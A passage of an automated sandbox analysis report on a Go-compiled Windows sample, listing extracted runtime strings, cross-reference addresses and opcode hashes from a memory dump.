                                                                                • String ID: $+,-./05:;<=?BCMOSZ["]_`hms{} + @ P [(") )(), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03$: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...///125625:\/???ADTASTAprAugBSTCATCDTCE$<=?BCMOSZ["]_`hms{} + @ P [(") )(), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06
                                                                                • API String ID: 0-1984634995
                                                                                • Opcode ID: d2ae6f874813a7b4cec93520c1212da09dcafe1cb9067df4e08538fd55a1dbb1
                                                                                • Instruction ID: a566f1537fddff7f9ddaee4a19907554e95528f49cb27856747e0c02cdc5e222
                                                                                • Opcode Fuzzy Hash: d2ae6f874813a7b4cec93520c1212da09dcafe1cb9067df4e08538fd55a1dbb1
                                                                                • Instruction Fuzzy Hash: 7551B774909B859FC340EF76E29561EBBE0AF88348F80881DF4898B352D774D9489B63
                                                                                Strings
                                                                                • bad status in shrinkstackbad system huge page sizechansend: spurious wakeupcheckdead: no m for timerexplicit tag has no childinconsistent poll.fdMutexinvalid cross-device linkinvalid network interfaceinvalid object identifiermissing stack in newstackmissing tr, xrefs: 00AF9D89
                                                                                • shrinking stack in libcallstartlockedm: locked to metoo many colons in addresstruncated base 128 integeruse of invalid sweepLockerx509: invalid simple chainx509: malformed extensionsx509: malformed parameters is not assignable to type not in stack roots range, xrefs: 00AF9D5D
                                                                                • shrinkstack at bad timespan has no free stacksstack growth after forksyntax error in patternsystem huge page size (too many pointers (>10)truncated tag or lengthwork.nwait > work.nprocx509: invalid key usagex509: malformed UTCTimex509: malformed version1164153, xrefs: 00AF9D73
                                                                                • missing stack in shrinkstackmspan.sweep: m is not lockednewproc1: new g is not Gdeadnewproc1: newg missing stackos: process already finishedprotocol driver not attached : len > cap : In of non-func typeregion exceeds uintptr range , xrefs: 00AF9D9F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: bad status in shrinkstackbad system huge page sizechansend: spurious wakeupcheckdead: no m for timerexplicit tag has no childinconsistent poll.fdMutexinvalid cross-device linkinvalid network interfaceinvalid object identifiermissing stack in newstackmissing tr$missing stack in shrinkstackmspan.sweep: m is not lockednewproc1: new g is not Gdeadnewproc1: newg missing stackos: process already finishedprotocol driver not attached : len > cap : In of non-func typeregion exceeds uintptr range $shrinking stack in libcallstartlockedm: locked to metoo many colons in addresstruncated base 128 integeruse of invalid sweepLockerx509: invalid simple chainx509: malformed extensionsx509: malformed parameters is not assignable to type not in stack roots range$shrinkstack at bad timespan has no free stacksstack growth after forksyntax error in patternsystem huge page size (too many pointers (>10)truncated tag or lengthwork.nwait > work.nprocx509: invalid key usagex509: malformed UTCTimex509: malformed version1164153
                                                                                • API String ID: 0-1834865256
                                                                                • Opcode ID: 12d22d7cee3f3e833ad0431dd4b6c8bb71538157fc731c6b8ee52e36febe1d38
                                                                                • Instruction ID: 4978cec1e54a3ebb43a85f2f6aaf45cdfaf45a3714601014703745b4c1399904
                                                                                • Opcode Fuzzy Hash: 12d22d7cee3f3e833ad0431dd4b6c8bb71538157fc731c6b8ee52e36febe1d38
                                                                                • Instruction Fuzzy Hash: 2D4189746043498FDB24EFA4C1D1BBA77E1BB88700F5448ACEA898B352E734DD45DB52
                                                                                Strings
                                                                                • , limit = /dev/stdin012345678912207031256103515625AdditionalAssemblyOSBad varintC:\WindowsCancelIoExChorasmianClassCHAOSClassCSNETCreateFileCreatePipeDSA-SHA256DeprecatedDevanagariDispInvokeDnsQuery_WECDSA-SHA1Exception GC forcedGOMAXPROCSGetIfEntryGetVersion, xrefs: 00AD85BC
                                                                                • ., xrefs: 00AD85F9
                                                                                • sysGrow bounds not aligned to pallocChunkBytesx509: failed to parse rfc822Name constraint %qx509: failed to unmarshal elliptic curve pointx509: malformed signature algorithm identifier (temporarily override with GODEBUG=x509sha1=1)Export directory contains man, xrefs: 00AD85F0
                                                                                • runtime: base = runtime: gp: gp=runtime: head = runtime: nelems=schedule: in cgotime: bad [0-9]*timeBeginPeriod, xrefs: 00AD8592
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: , limit = /dev/stdin012345678912207031256103515625AdditionalAssemblyOSBad varintC:\WindowsCancelIoExChorasmianClassCHAOSClassCSNETCreateFileCreatePipeDSA-SHA256DeprecatedDevanagariDispInvokeDnsQuery_WECDSA-SHA1Exception GC forcedGOMAXPROCSGetIfEntryGetVersion$.$runtime: base = runtime: gp: gp=runtime: head = runtime: nelems=schedule: in cgotime: bad [0-9]*timeBeginPeriod$sysGrow bounds not aligned to pallocChunkBytesx509: failed to parse rfc822Name constraint %qx509: failed to unmarshal elliptic curve pointx509: malformed signature algorithm identifier (temporarily override with GODEBUG=x509sha1=1)Export directory contains man
                                                                                • API String ID: 0-2206806273
                                                                                • Opcode ID: 4f091bf92d119d97d0e928f77c182730e1ba5e91be69232978141b23d35d7866
                                                                                • Instruction ID: e9d5c31abcc1b5fbe76bfcc0666fb398e4a74677ba376c79ca91f97fe08ae4b9
                                                                                • Opcode Fuzzy Hash: 4f091bf92d119d97d0e928f77c182730e1ba5e91be69232978141b23d35d7866
                                                                                • Instruction Fuzzy Hash: 2131CDB59087498FCB10EF24D58136EB7E0BF88304F40896EE98697342DB74ED49CB92
                                                                                Strings
                                                                                • runtime: g: g=runtime: addr = runtime: base = runtime: gp: gp=runtime: head = runtime: nelems=schedule: in cgotime: bad [0-9]*timeBeginPeriod, xrefs: 00AE752A
                                                                                • , goid=, j0 = 19531252.5.4.32.5.4.52.5.4.62.5.4.72.5.4.82.5.4.99765625AvestanBengaliBorlandBrailleChanDirCopySidCypriotDeseretEd25519ElbasanElymaicFreeSidGODEBUGGranthaHanunooIO waitImplMapJanuaryKannadaMD2-RSAMD5-RSAMUI_DltMUI_StdMakasarMandaicMarchenMultaniM, xrefs: 00AE749C, 00AE754C
                                                                                • , g->atomicstatus=, gp->atomicstatus=149011611938476562520060102150405Z07007450580596923828125ARM64 little endianAltai Standard TimeBahia Standard TimeCanadian_AboriginalChina Standard TimeCreateSymbolicLinkWCryptReleaseContextDllUnregisterServerEgypt Standar, xrefs: 00AE7576
                                                                                • , gp->atomicstatus=149011611938476562520060102150405Z07007450580596923828125ARM64 little endianAltai Standard TimeBahia Standard TimeCanadian_AboriginalChina Standard TimeCreateSymbolicLinkWCryptReleaseContextDllUnregisterServerEgypt Standard TimeGC work not f, xrefs: 00AE74C6
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: , g->atomicstatus=, gp->atomicstatus=149011611938476562520060102150405Z07007450580596923828125ARM64 little endianAltai Standard TimeBahia Standard TimeCanadian_AboriginalChina Standard TimeCreateSymbolicLinkWCryptReleaseContextDllUnregisterServerEgypt Standar$, goid=, j0 = 19531252.5.4.32.5.4.52.5.4.62.5.4.72.5.4.82.5.4.99765625AvestanBengaliBorlandBrailleChanDirCopySidCypriotDeseretEd25519ElbasanElymaicFreeSidGODEBUGGranthaHanunooIO waitImplMapJanuaryKannadaMD2-RSAMD5-RSAMUI_DltMUI_StdMakasarMandaicMarchenMultaniM$, gp->atomicstatus=149011611938476562520060102150405Z07007450580596923828125ARM64 little endianAltai Standard TimeBahia Standard TimeCanadian_AboriginalChina Standard TimeCreateSymbolicLinkWCryptReleaseContextDllUnregisterServerEgypt Standard TimeGC work not f$runtime: g: g=runtime: addr = runtime: base = runtime: gp: gp=runtime: head = runtime: nelems=schedule: in cgotime: bad [0-9]*timeBeginPeriod
                                                                                • API String ID: 0-1504408036
                                                                                • Opcode ID: 6ab0c7157c490388e8390ccfcaf401a17d370ddc7a223d192c1f2453f247e0b8
                                                                                • Instruction ID: bb50c0447d25b126bef124b2d6e6b114939f86b36b33e6adad86a1344627127c
                                                                                • Opcode Fuzzy Hash: 6ab0c7157c490388e8390ccfcaf401a17d370ddc7a223d192c1f2453f247e0b8
                                                                                • Instruction Fuzzy Hash: 0C4196B4908B85CFC304EF29E29565EBBE0BF88748F418C6DE48887352D774D948DB62
                                                                                Strings
                                                                                • min must be a non-zero power of 2misrounded allocation in sysAlloc .nameFrom: name too long: : Field index out of range : NumOut of non-func type : array index out of range : chanDir of non-chan type : slice index out of r, xrefs: 00AD0459
                                                                                • min too largenil stackbaseout of memoryparsing time powrprof.dll, xrefs: 00AD040A
                                                                                • !, xrefs: 00AD0462
                                                                                • runtime: min = runtimer: bad pscan missed a gstartm: m has pstopm holding punknown Go type already; errno= mheap.sweepgen= not in ranges: untyped locals , not a function0123456789ABCDEF0123456789abcdef2384185791015625: value of type AddDllDirectory, xrefs: 00AD03D6, 00AD0425
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: !$min must be a non-zero power of 2misrounded allocation in sysAlloc .nameFrom: name too long: : Field index out of range : NumOut of non-func type : array index out of range : chanDir of non-chan type : slice index out of r$min too largenil stackbaseout of memoryparsing time powrprof.dll$runtime: min = runtimer: bad pscan missed a gstartm: m has pstopm holding punknown Go type already; errno= mheap.sweepgen= not in ranges: untyped locals , not a function0123456789ABCDEF0123456789abcdef2384185791015625: value of type AddDllDirectory
                                                                                • API String ID: 0-3415125760
                                                                                • Opcode ID: 53bce4dba7a613f4acc2ec0dccd73c86ff0b978f69dcb3be32a55b0d09c4e6c3
                                                                                • Instruction ID: b9d64cb32e4ee6d50a1470dff2064e1344ff458b1b978597c0d27c4171a00fb8
                                                                                • Opcode Fuzzy Hash: 53bce4dba7a613f4acc2ec0dccd73c86ff0b978f69dcb3be32a55b0d09c4e6c3
                                                                                • Instruction Fuzzy Hash: 83316C74908786CFC710FF65C295B5EB7E0BF84708F40895EE8994B382E7749A099B63
                                                                                Strings
                                                                                • m->p= max= min= next= p->m= prev= span=% util(...), i = , not .reloc390625<-chanAnswerArabicAugustBrahmiCarianChakmaCommonCopticENCLogENCMapExpectExportFlags=FormatFridayGOROOTGetACPGothicHangulHatranHebrewHyphenIgnoreImportKaithiKhojkiLepchaLycianLydianMI, xrefs: 00AEFFCB
                                                                                • p->status= s.nelems= schedtick= span.list= timerslen=%!(BADPREC), elemsize=, npages = -syncWithWU/dev/stderr/dev/stdout30517578125: frame.sp=AssemblyRefBLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s-256BoundImportClassHESIODClassLayoutCloseHandleCoGetObjectCreateF, xrefs: 00AF0017
                                                                                • releasep: m=runtime: gp=runtime: sp=self-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringswintrust.dllwirep: p->m=worker mode wtsapi32.dll != sweepgen (default %q) (default %v) MB globals, MB) workers= called from flushedWork idlethreads=, xrefs: 00AEFFA9
                                                                                • releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverabletimer data corruptiontrace/br, xrefs: 00AF0061
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: m->p= max= min= next= p->m= prev= span=% util(...), i = , not .reloc390625<-chanAnswerArabicAugustBrahmiCarianChakmaCommonCopticENCLogENCMapExpectExportFlags=FormatFridayGOROOTGetACPGothicHangulHatranHebrewHyphenIgnoreImportKaithiKhojkiLepchaLycianLydianMI$ p->status= s.nelems= schedtick= span.list= timerslen=%!(BADPREC), elemsize=, npages = -syncWithWU/dev/stderr/dev/stdout30517578125: frame.sp=AssemblyRefBLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s-256BoundImportClassHESIODClassLayoutCloseHandleCoGetObjectCreateF$releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverabletimer data corruptiontrace/br$releasep: m=runtime: gp=runtime: sp=self-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringswintrust.dllwirep: p->m=worker mode wtsapi32.dll != sweepgen (default %q) (default %v) MB globals, MB) workers= called from flushedWork idlethreads=
                                                                                • API String ID: 0-2313186036
                                                                                • Opcode ID: 9b97a90321612821d8cbcff9815e3c9cf5eb3b9e09809481daa8869b4f9ca8d9
                                                                                • Instruction ID: a4ed417d9825909e1269f87cfc70f2de51b2e017975a543ada8fda5e1e654bac
                                                                                • Opcode Fuzzy Hash: 9b97a90321612821d8cbcff9815e3c9cf5eb3b9e09809481daa8869b4f9ca8d9
                                                                                • Instruction Fuzzy Hash: A031F4B4908B458FC300EF65D294B5EBBE0FF88308F45896DE8888B352D774D948DB62
                                                                                Strings
                                                                                • +, xrefs: 00AD65AB
                                                                                • runtime: summary max pages = semacquire not on the G stackstring concatenation too longsyntax error scanning booleantimeBegin/EndPeriod not foundtoo many open files in systemx509: cannot parse URI %q: %sx509: cannot parse dnsName %qx509: malformed serial numbe, xrefs: 00AD656E
                                                                                • runtime: root level max pages = runtime: setevent failed; errno=runtime: stack split at bad timeruntime: sudog with non-nil elemruntime: sudog with non-nil nextruntime: sudog with non-nil prevscanstack: goroutine not stoppedslice bounds out of range [%x::]slic, xrefs: 00AD6526
                                                                                • root level max pages doesn't fit in summary : finalizer already set : first argument is nilruntime: casfrom_Gscanstatus bad oldval gp=runtime: heapBitsSetTypeGCProg: total bits runtime: releaseSudog with non-nil gp.paramru, xrefs: 00AD65A2
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: +$root level max pages doesn't fit in summary : finalizer already set : first argument is nilruntime: casfrom_Gscanstatus bad oldval gp=runtime: heapBitsSetTypeGCProg: total bits runtime: releaseSudog with non-nil gp.paramru$runtime: root level max pages = runtime: setevent failed; errno=runtime: stack split at bad timeruntime: sudog with non-nil elemruntime: sudog with non-nil nextruntime: sudog with non-nil prevscanstack: goroutine not stoppedslice bounds out of range [%x::]slic$runtime: summary max pages = semacquire not on the G stackstring concatenation too longsyntax error scanning booleantimeBegin/EndPeriod not foundtoo many open files in systemx509: cannot parse URI %q: %sx509: cannot parse dnsName %qx509: malformed serial numbe
                                                                                • API String ID: 0-1971791911
                                                                                • Opcode ID: 5247499f80652343d0158457bb47e5dfb5aa7aec6845c5ac8c6fdfea15a34c35
                                                                                • Instruction ID: 782f5877f7cc76e124954fb5fb251a3f54fcac6ea93698caef5858f1bc8991c1
                                                                                • Opcode Fuzzy Hash: 5247499f80652343d0158457bb47e5dfb5aa7aec6845c5ac8c6fdfea15a34c35
                                                                                • Instruction Fuzzy Hash: 84315EB49047418FC304EF75E29575E7BE1BF84344F50886DE8868B352EB75D84ACB52
                                                                                Strings
                                                                                • range partially overlaps resource length too longrunqsteal: runq overflowruntime: VirtualFree of runtime: found obj at *(runtime: markroot index runtime: p.searchAddr = span has no free objectsstack trace unavailablestructure needs clea, xrefs: 00AD7C6C
                                                                                • runtime: addr = runtime: base = runtime: gp: gp=runtime: head = runtime: nelems=schedule: in cgotime: bad [0-9]*timeBeginPeriod, xrefs: 00AD7B9A
                                                                                • , bound = , limit = /dev/stdin012345678912207031256103515625AdditionalAssemblyOSBad varintC:\WindowsCancelIoExChorasmianClassCHAOSClassCSNETCreateFileCreatePipeDSA-SHA256DeprecatedDevanagariDispInvokeDnsQuery_WECDSA-SHA1Exception GC forcedGOMAXPROCSGetIfEntry, xrefs: 00AD7C38
                                                                                • , size = , tail = -07:00:00244140625: status=AuthorityBassa_VahBhaiksukiClassINETCuneiformDiacriticExceptionFindCloseGlobalPtrHex_DigitInheritedInterfaceKhudawadiLocalFreeMalayalamMemberRefMethodDefMethodPtrModuleRefMongolianMoveFileWNabataeanPalmyreneParseUin, xrefs: 00AD7BC4
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: , bound = , limit = /dev/stdin012345678912207031256103515625AdditionalAssemblyOSBad varintC:\WindowsCancelIoExChorasmianClassCHAOSClassCSNETCreateFileCreatePipeDSA-SHA256DeprecatedDevanagariDispInvokeDnsQuery_WECDSA-SHA1Exception GC forcedGOMAXPROCSGetIfEntry$, size = , tail = -07:00:00244140625: status=AuthorityBassa_VahBhaiksukiClassINETCuneiformDiacriticExceptionFindCloseGlobalPtrHex_DigitInheritedInterfaceKhudawadiLocalFreeMalayalamMemberRefMethodDefMethodPtrModuleRefMongolianMoveFileWNabataeanPalmyreneParseUin$range partially overlaps resource length too longrunqsteal: runq overflowruntime: VirtualFree of runtime: found obj at *(runtime: markroot index runtime: p.searchAddr = span has no free objectsstack trace unavailablestructure needs clea$runtime: addr = runtime: base = runtime: gp: gp=runtime: head = runtime: nelems=schedule: in cgotime: bad [0-9]*timeBeginPeriod
                                                                                • API String ID: 0-3922939405
                                                                                • Opcode ID: 493cb7b39ace7a62084858490c2540d7d9e744c450789e8f0bbc9fd7c006eda9
                                                                                • Instruction ID: 8649060eb0aadd63797979c8571bcf959064116c4b8a0ece0fe8954dc3c6a280
                                                                                • Opcode Fuzzy Hash: 493cb7b39ace7a62084858490c2540d7d9e744c450789e8f0bbc9fd7c006eda9
                                                                                • Instruction Fuzzy Hash: D4310AB4909B458FC700EF65D29575EBBE1BF88308F80886EE48A4B352E7749849DB52
                                                                                Strings
                                                                                • ), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...///125625:\/???ADT, xrefs: 00AD7A42
                                                                                • runtime: summary[runtime: textOff runtime: typeOff scanobject n == 0select (no cases)stack: frame={sp:swept cached spanthread exhaustionunknown caller pcunknown type kindwait for GC cyclewine_get_version, xrefs: 00AD7968
                                                                                • ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...///125625:\/???ADTASTAprAugBSTCATCDTCETCLRCSTDSADecDltE (EATEDTEETEOFESTFPOFebFriGMTHDTHSTHanIATIDTISTJSTJanJulJunKSTLaoMD4MD5, xrefs: 00AD7992
                                                                                • , ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...///125625:\/???ADTAS, xrefs: 00AD79EE, 00AD7A18
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...///125625:\/???ADT$, ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...///125625:\/???ADTAS$][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...///125625:\/???ADTASTAprAugBSTCATCDTCETCLRCSTDSADecDltE (EATEDTEETEOFESTFPOFebFriGMTHDTHSTHanIATIDTISTJSTJanJulJunKSTLaoMD4MD5$runtime: summary[runtime: textOff runtime: typeOff scanobject n == 0select (no cases)stack: frame={sp:swept cached spanthread exhaustionunknown caller pcunknown type kindwait for GC cyclewine_get_version
                                                                                • API String ID: 0-3450498712
                                                                                • Opcode ID: e76c5ad60e8ba504eb3a8b96d3777fec62db423d522212433ebdc4e79634df64
                                                                                • Instruction ID: 2169b84dc7826dd55c170bf07479b638c2cdeccac5a0c95b9420ac77fc69811e
                                                                                • Opcode Fuzzy Hash: e76c5ad60e8ba504eb3a8b96d3777fec62db423d522212433ebdc4e79634df64
                                                                                • Instruction Fuzzy Hash: 9331E6B8509B40CFC304EF65E28571EFBE4FF88748F50892EE88987312E77499449B52
                                                                                Strings
                                                                                • scan missed a gstartm: m has pstopm holding punknown Go type already; errno= mheap.sweepgen= not in ranges: untyped locals , not a function0123456789ABCDEF0123456789abcdef2384185791015625: value of type AddDllDirectory, xrefs: 00AC8EA3
                                                                                • goid jobs= list= m->p= max= min= next= p->m= prev= span=% util(...), i = , not .reloc390625<-chanAnswerArabicAugustBrahmiCarianChakmaCommonCopticENCLogENCMapExpectExportFlags=FormatFridayGOROOTGetACPGothicHangulHatranHebrewHyphenIgnoreImportKaithiKhojkiLe, xrefs: 00AC8E22
                                                                                • status %!Month(2.5.4.102.5.4.112.5.4.1748828125AcceptExArmenianAssemblyBalineseBopomofoBugineseCancelIoCherokeeClassANYCodeViewConstantCyrillicDNS nameDSA-SHA1DecemberDuployanEqualSidEthiopicEventMapEventPtrExtenderFebruaryFieldPtrFieldRVAFullPathGeorgianGoSt, xrefs: 00AC8E4C
                                                                                • gcscandone m->gsignal= nDataRoots= nSpanRoots= pages/byte preemptoff= s.elemsize= s.sweepgen= span.limit= span.state= sysmonwait= wbuf1=<nil> wbuf2=<nil>%!(BADWIDTH)) p->status=, cons/mark -byte limit152587890625762939453125Align 1-ByteArchitectureBidi_Con, xrefs: 00AC8E76
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: gcscandone m->gsignal= nDataRoots= nSpanRoots= pages/byte preemptoff= s.elemsize= s.sweepgen= span.limit= span.state= sysmonwait= wbuf1=<nil> wbuf2=<nil>%!(BADWIDTH)) p->status=, cons/mark -byte limit152587890625762939453125Align 1-ByteArchitectureBidi_Con$ goid jobs= list= m->p= max= min= next= p->m= prev= span=% util(...), i = , not .reloc390625<-chanAnswerArabicAugustBrahmiCarianChakmaCommonCopticENCLogENCMapExpectExportFlags=FormatFridayGOROOTGetACPGothicHangulHatranHebrewHyphenIgnoreImportKaithiKhojkiLe$ status %!Month(2.5.4.102.5.4.112.5.4.1748828125AcceptExArmenianAssemblyBalineseBopomofoBugineseCancelIoCherokeeClassANYCodeViewConstantCyrillicDNS nameDSA-SHA1DecemberDuployanEqualSidEthiopicEventMapEventPtrExtenderFebruaryFieldPtrFieldRVAFullPathGeorgianGoSt$scan missed a gstartm: m has pstopm holding punknown Go type already; errno= mheap.sweepgen= not in ranges: untyped locals , not a function0123456789ABCDEF0123456789abcdef2384185791015625: value of type AddDllDirectory
                                                                                • API String ID: 0-120346602
                                                                                • Opcode ID: 01272842cbe83a2aa651545f7c4019752785842ceab35fd947e26a89c47af03a
                                                                                • Instruction ID: 2aa7166546d26878bd5049663a55678a437a007055983cd4a0c1e3b0f7a7521c
                                                                                • Opcode Fuzzy Hash: 01272842cbe83a2aa651545f7c4019752785842ceab35fd947e26a89c47af03a
                                                                                • Instruction Fuzzy Hash: CC31E7B4908B858FC304FF25D29575EBBE0BF85304F85886DE8D987352E7389948DB62
                                                                                Strings
                                                                                • newval= nfreed= pointer stack=[ status %!Month(2.5.4.102.5.4.112.5.4.1748828125AcceptExArmenianAssemblyBalineseBopomofoBugineseCancelIoCherokeeClassANYCodeViewConstantCyrillicDNS nameDSA-SHA1DecemberDuployanEqualSidEthiopicEventMapEventPtrExtenderFebruaryFiel, xrefs: 00AE7D09
                                                                                • castogscanstatuscontext canceleddivision by zerogc: unswept spangcshrinkstackoffgetprotobynumberinteger overflowinvalid argumentinvalid encodinginvalid exchangeinvalid g statuslength too largemSpanList.insertmSpanList.removemessage too longmissing stackmapnewm, xrefs: 00AE7D3D
                                                                                • !, xrefs: 00AE7CE8
                                                                                • runtime: castogscanstatus oldval=runtime: failed mSpanList.insert runtime: failed to decommit pagesruntime: goroutine stack exceeds runtime: memory allocated by OS [runtime: name offset out of rangeruntime: text offset out of rangeruntime: type offset out of r, xrefs: 00AE7CDF
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: newval= nfreed= pointer stack=[ status %!Month(2.5.4.102.5.4.112.5.4.1748828125AcceptExArmenianAssemblyBalineseBopomofoBugineseCancelIoCherokeeClassANYCodeViewConstantCyrillicDNS nameDSA-SHA1DecemberDuployanEqualSidEthiopicEventMapEventPtrExtenderFebruaryFiel$!$castogscanstatuscontext canceleddivision by zerogc: unswept spangcshrinkstackoffgetprotobynumberinteger overflowinvalid argumentinvalid encodinginvalid exchangeinvalid g statuslength too largemSpanList.insertmSpanList.removemessage too longmissing stackmapnewm$runtime: castogscanstatus oldval=runtime: failed mSpanList.insert runtime: failed to decommit pagesruntime: goroutine stack exceeds runtime: memory allocated by OS [runtime: name offset out of rangeruntime: text offset out of rangeruntime: type offset out of r
                                                                                • API String ID: 0-1438149499
                                                                                • Opcode ID: 70991eeca9402bbccaddda6045466f48dc60c8e1077969e779614331610019f7
                                                                                • Instruction ID: 12979118821c4b8ff60fcdde451a4720a6a3a6d97cd152d5403aa1390ed4a111
                                                                                • Opcode Fuzzy Hash: 70991eeca9402bbccaddda6045466f48dc60c8e1077969e779614331610019f7
                                                                                • Instruction Fuzzy Hash: DC1129B45087859FC300FF35D29576EBBE0EF84348F90885DE4C887252E77498498B52
                                                                                Strings
                                                                                • runtime: netpoll: PostQueuedCompletionStatus failed (errno= abiRegArgsType needs GC Prog, update methodValueCallFrameObjsoffset parameter must be a multiple of the system's page sizex509: failed to parse URI constraint %q: cannot be IP addressx509: internal er, xrefs: 00ADDF4D
                                                                                • ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...///125625:\/???ADTASTAprAugBSTCATCDTCETCLRCSTDSADecDltE (EATEDTEETEOFESTFPOFebFriGMTHDTHSTHanIATIDTISTJSTJanJulJunKSTLaoMD4MD5MDTMPXMSKMSTMarMayMonMroNDTNS, xrefs: 00ADDF77
